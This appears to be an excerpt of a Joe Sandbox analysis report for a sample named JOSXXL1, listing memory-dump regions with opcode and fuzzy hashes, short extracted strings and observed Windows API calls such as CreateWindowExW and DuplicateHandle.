                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dc8c999f40ca2724169d62c8daf80f74ec24ca047bc57ec46c73e02a5709fc93
                                                                                                        • Instruction ID: 0e07886836b13c1f1496f2593a8b538e3533358ad148515c63dfab8be08a1d71
                                                                                                        • Opcode Fuzzy Hash: dc8c999f40ca2724169d62c8daf80f74ec24ca047bc57ec46c73e02a5709fc93
                                                                                                        • Instruction Fuzzy Hash: A551B574E00208DFDB19DFBAD584A9DBBB2BF89301F249029E815AB364DB355945CF14
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2dcd399fcc100d5737fb897ca428137ab09e3aed69b84204b86561a96980d597
                                                                                                        • Instruction ID: a0915718d3b9f834f9acf1cf839ce79be45326bf432b999f0ee31ada0fc01126
                                                                                                        • Opcode Fuzzy Hash: 2dcd399fcc100d5737fb897ca428137ab09e3aed69b84204b86561a96980d597
                                                                                                        • Instruction Fuzzy Hash: 7E51A474E00208DFDB18DFAAD584A9DBBF2BF88300F249029E819BB364DB319945CF54
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974913948.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7c0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 418010bd53e0f2b78ece935d455dbf12c6e18f2d805d7648c9bb10f85d695b1a
                                                                                                        • Instruction ID: d33ad5fec2a4525a5a24c21c7d557aea6f39ac9f7b792f1017596289dc239a58
                                                                                                        • Opcode Fuzzy Hash: 418010bd53e0f2b78ece935d455dbf12c6e18f2d805d7648c9bb10f85d695b1a
                                                                                                        • Instruction Fuzzy Hash: 9E517B71D053498FDB24CFAAD8942CDBBB2BF8A300F50E1A9C014BB215EB35A945CF90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974913948.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7c0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: c233111f48a03c8e6a404a0af7cd27e827e5779ad0db569df7083c208337f39f
                                                                                                        • Instruction ID: 84d7f44f09c51fa9d163eba1e1b36bd218116339ceeedffd697b6796b3033363
                                                                                                        • Opcode Fuzzy Hash: c233111f48a03c8e6a404a0af7cd27e827e5779ad0db569df7083c208337f39f
                                                                                                        • Instruction Fuzzy Hash: 4C413974D053588BDB24CFAAD9942DDBBB2BF8A300F54E069D419BB265EB385909CF40
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 10de0bb3afecfb38bc29af639921605a02d1c243fac997709d11e89ab91bb1f2
                                                                                                        • Instruction ID: 06f1847a08f702333ff569f8308f8260c121659e0a05f370c72b88d9a28cd187
                                                                                                        • Opcode Fuzzy Hash: 10de0bb3afecfb38bc29af639921605a02d1c243fac997709d11e89ab91bb1f2
                                                                                                        • Instruction Fuzzy Hash: C04169B1E016198BEB58CF6BC9447DEFAF3AFC9300F54C1AAC40DA6264DB740A858F51
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974913948.000000003A7C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7c0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0aada69af4055582ce0c0ddbd06bc4bbf6271e9000a0c076da5bd0f13360498f
                                                                                                        • Instruction ID: 00b7d313e94698e243b8caf5fa5822f46f7e006beb571436d4e148234e9f4d92
                                                                                                        • Opcode Fuzzy Hash: 0aada69af4055582ce0c0ddbd06bc4bbf6271e9000a0c076da5bd0f13360498f
                                                                                                        • Instruction Fuzzy Hash: F941F574E00248CFEB48CFAAD8806DEFBB2AF89300F10D12AD409BB254EB755946CF54
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975012798.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a800000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2a7ba76b42a6703097a680db4c1fac9c42a8a49a9dc25922fb93f7360d9025a3
                                                                                                        • Instruction ID: fc26c604a9c3b233ea9892a81d4fb73c39eddfb6cf9d78a0d69e66b914c65b5a
                                                                                                        • Opcode Fuzzy Hash: 2a7ba76b42a6703097a680db4c1fac9c42a8a49a9dc25922fb93f7360d9025a3
                                                                                                        • Instruction Fuzzy Hash: A341F2B0E052189FDB18DFAAD8546DDBBF2BF89300F14D06AD418BB264EB745946CF44

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (okq$(okq$(okq$(okq$(okq$(okq$,oq$,oq
                                                                                                        • API String ID: 0-2636989756
                                                                                                        • Opcode ID: fa3ad30cfc4e4ec6b1516b1b952153731c4deedb12ab3b0ba7e86b54742cbf09
                                                                                                        • Instruction ID: f47590ce0cb0bc8d64607b69bd241927ba4803401bce04a75799c0a2fa9c651c
                                                                                                        • Opcode Fuzzy Hash: fa3ad30cfc4e4ec6b1516b1b952153731c4deedb12ab3b0ba7e86b54742cbf09
                                                                                                        • Instruction Fuzzy Hash: 1D126B30A04205CFCB15CF68E985AAEBBF2FF49315F158599E8299B3A1D730ED49CB50

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 'A7U$'A7U$8pq$Hoq$Hoq$Hoq$TJpq
                                                                                                        • API String ID: 0-4035071452
                                                                                                        • Opcode ID: fdad26b1de3777aee2dedac29c047e38c971179e935647c6d9009acb96622364
                                                                                                        • Instruction ID: b14d8eb554fb794964d8c4ae570fb41fa5dc0bf8c44a484a986f5c1bbe1e0055
                                                                                                        • Opcode Fuzzy Hash: fdad26b1de3777aee2dedac29c047e38c971179e935647c6d9009acb96622364
                                                                                                        • Instruction Fuzzy Hash: 22D11534B052148FDB04DF68C491AEE7BB6FF89360F14416AE505EB3A1CA35EC46CB92

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $Hoq$Hoq$Hoq$x4A7$x4A7
                                                                                                        • API String ID: 0-623027639
                                                                                                        • Opcode ID: 6abd3af9359e2b6e65e48e6e275497053f919c83873f38d9993a285b5620367e
                                                                                                        • Instruction ID: 4f78e047b2e7536d3bb6d5269332834633c96968bcab9b88890946dc36ac1d8e
                                                                                                        • Opcode Fuzzy Hash: 6abd3af9359e2b6e65e48e6e275497053f919c83873f38d9993a285b5620367e
                                                                                                        • Instruction Fuzzy Hash: DA81F3347007449BDB15AF3888556AE3AA2EFC9360F204229F526DB3D1CF349D42C796

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ( E7$((E7$0!E7$LRkq$h-E7
                                                                                                        • API String ID: 0-2900786413
                                                                                                        • Opcode ID: e9f46dd09e99a942c236e4c584ffafaf3c69749ab22db5f95b8c8116d99a4593
                                                                                                        • Instruction ID: b8c6d434ca2a5e9b804684cde0864c625bf8679c5d56bc8bc90ebdb5f857840b
                                                                                                        • Opcode Fuzzy Hash: e9f46dd09e99a942c236e4c584ffafaf3c69749ab22db5f95b8c8116d99a4593
                                                                                                        • Instruction Fuzzy Hash: BC527674A00619CFCB54DF64DD94A9DBBB2FB89301F1045EAD409A7765DB30AE86CF80
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 3A8499EE
                                                                                                        • GetCurrentThread.KERNEL32 ref: 3A849A2B
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 3A849A68
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 3A849AC1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975138885.000000003A840000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A840000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a840000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: 52d8780119167797b6d2a07496fe2b3e7c7bf4c40b2e54a9e46708a96bbc4890
                                                                                                        • Instruction ID: 1d77d696364ace37534c3139d179144b1a707f77a91987b62eec46d271bee244
                                                                                                        • Opcode Fuzzy Hash: 52d8780119167797b6d2a07496fe2b3e7c7bf4c40b2e54a9e46708a96bbc4890
                                                                                                        • Instruction Fuzzy Hash: 225146B09043498FDB14CFA9C948BEEFBF1EF49310F20845AE449A7261DB34A985CF65
                                                                                                        APIs
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 3A8499EE
                                                                                                        • GetCurrentThread.KERNEL32 ref: 3A849A2B
                                                                                                        • GetCurrentProcess.KERNEL32 ref: 3A849A68
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 3A849AC1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975138885.000000003A840000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A840000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a840000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Current$ProcessThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2063062207-0
                                                                                                        • Opcode ID: 45573eefd052be00c166de8002b2a859b984676f2f640445a33cd21932cded1a
                                                                                                        • Instruction ID: 982ba0ffac9a76d7bc49c989d737d933d40b70d06408eadf8acacc784d60b8ee
                                                                                                        • Opcode Fuzzy Hash: 45573eefd052be00c166de8002b2a859b984676f2f640445a33cd21932cded1a
                                                                                                        • Instruction Fuzzy Hash: D35123B19043498FDB14DFA9C548BEEBBF1EF88310F20C459E459A7260DB38A985CF65
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $kq$$kq
                                                                                                        • API String ID: 0-3550614674
                                                                                                        • Opcode ID: 1bba230f2bbabb0710382ae1b93cfd5cba4da10f954f0789382aa2274baeaa51
                                                                                                        • Instruction ID: e1e9221370c944869af58106ee4637d0595cca378ff1dbffe4e069d3a8193254
                                                                                                        • Opcode Fuzzy Hash: 1bba230f2bbabb0710382ae1b93cfd5cba4da10f954f0789382aa2274baeaa51
                                                                                                        • Instruction Fuzzy Hash: 76522074A00218CFEB14DBA4C950B9EBB77EF84300F1081A9D50A7B3A5CF359E89AF51
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Hoq$Hoq
                                                                                                        • API String ID: 0-3106737575
                                                                                                        • Opcode ID: da49479f4b09f547fe9d527dc770b47ec29dddf86604b6a7c1128a9be78827f7
                                                                                                        • Instruction ID: 25355ad7de51638fac20362abdab9ecf0743c9821fac7e8957016ff74b42eaf0
                                                                                                        • Opcode Fuzzy Hash: da49479f4b09f547fe9d527dc770b47ec29dddf86604b6a7c1128a9be78827f7
                                                                                                        • Instruction Fuzzy Hash: DFB19E30708214CFCB159F358894B7A7BB6AFC8302F55456AE816CB3A6DB34CC89D791
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: ,oq$,oq
                                                                                                        • API String ID: 0-3825397795
                                                                                                        • Opcode ID: 632ac27b746ea70d20c4c003e2d760c4d58dfd5af176b5ec8ae328b53dfe618f
                                                                                                        • Instruction ID: 5f59e603994b751fae5352356ec4e4c0855229cffd9e3bb5854817fad05a9151
                                                                                                        • Opcode Fuzzy Hash: 632ac27b746ea70d20c4c003e2d760c4d58dfd5af176b5ec8ae328b53dfe618f
                                                                                                        • Instruction Fuzzy Hash: FC819F34A40505CFCB18CF69C48496ABBB2BF89312BA58169D825DF375DB31EC49CBE1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8pq$TJpq
                                                                                                        • API String ID: 0-1168589435
                                                                                                        • Opcode ID: 4a075f0222fbd8fc3008f453af1187818513f089a5d3957fcb6631483ca62162
                                                                                                        • Instruction ID: 34998dad9e9586ae272a7f22cad7c50cabe40c6985e827e97220c91d989d5096
                                                                                                        • Opcode Fuzzy Hash: 4a075f0222fbd8fc3008f453af1187818513f089a5d3957fcb6631483ca62162
                                                                                                        • Instruction Fuzzy Hash: E9312434B102198FCB00EFA8C581EDDBBB2EF88320F195550E505AB366DA30EC85CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 8pq$TJpq
                                                                                                        • API String ID: 0-1168589435
                                                                                                        • Opcode ID: 6ad8a359f83b7ff8de428c70789f50bd2661a57344ec434ee0be9af9e789dc90
                                                                                                        • Instruction ID: 2354e08a1730ecd3c7a2456033be40c10ee18ed57f3cfd4db847e451d848c0c4
                                                                                                        • Opcode Fuzzy Hash: 6ad8a359f83b7ff8de428c70789f50bd2661a57344ec434ee0be9af9e789dc90
                                                                                                        • Instruction Fuzzy Hash: 02313434B502198FCB00EFA8C581EDDBBB2EF88320F195594E505AB376DA70EC85CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'kq$4'kq
                                                                                                        • API String ID: 0-4171853269
                                                                                                        • Opcode ID: 1d1249c2b0479d854ec1b329f383754645b37830fd695cc75cd22b3a86debacb
                                                                                                        • Instruction ID: 79d2a7a800597cd9f4bdea8b1d62fc1ad6cc321b12821ac2d995da55728f1040
                                                                                                        • Opcode Fuzzy Hash: 1d1249c2b0479d854ec1b329f383754645b37830fd695cc75cd22b3a86debacb
                                                                                                        • Instruction Fuzzy Hash: A2F04435300118AFDB181BA5985497BBBDBEBC83A1B148429BD0AC7391DF66CC4683A1
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3A9346A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975215347.000000003A930000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a930000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: 414ccbd03483b8614ce2280105cd79d607de53437db7d9d65f19498a4f90e7fd
                                                                                                        • Instruction ID: fd66362544c20e22b8edd7d71b7e33e2e181fad72087c7eca2f660aa08a1b3f4
                                                                                                        • Opcode Fuzzy Hash: 414ccbd03483b8614ce2280105cd79d607de53437db7d9d65f19498a4f90e7fd
                                                                                                        • Instruction Fuzzy Hash: 5141C2B5D10309DFDF14CF9AC984ADEBBB5BF88314F61852AE418AB250D7759881CF90
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3A9346A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975215347.000000003A930000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a930000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 716092398-0
                                                                                                        • Opcode ID: 718aee17befee30873c92ae0d8a11e20159c64c2f5b14a526f8e377e7d0d1448
                                                                                                        • Instruction ID: d51d254180fa810967a85eb56cd2018584cbd09690f3d6a42ac92d4883fb66aa
                                                                                                        • Opcode Fuzzy Hash: 718aee17befee30873c92ae0d8a11e20159c64c2f5b14a526f8e377e7d0d1448
                                                                                                        • Instruction Fuzzy Hash: 1C41D2B1D00349DFDF14CF9AC984ADDBBB5BF88314F61812AE418AB250D7719881CF90
                                                                                                        APIs
                                                                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 3A936C11
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975215347.000000003A930000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a930000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CallProcWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2714655100-0
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3A849C3F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975138885.000000003A840000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A840000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a840000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3A849C3F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975138885.000000003A840000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A840000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a840000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        APIs
                                                                                                        • OleInitialize.OLE32(00000000), ref: 3A9390ED
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975215347.000000003A930000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a930000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Initialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2538663250-0
                                                                                                        APIs
                                                                                                        • OleInitialize.OLE32(00000000), ref: 3A9390ED
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975215347.000000003A930000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A930000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a930000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Initialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2538663250-0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Hoq
                                                                                                        • API String ID: 0-3049094369
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Hoq
                                                                                                        • API String ID: 0-3049094369
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F
                                                                                                        • API String ID: 0-2730988801
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: *A7U
                                                                                                        • API String ID: 0-345338622
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975012798.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a800000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2975012798.000000003A800000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A800000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a800000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
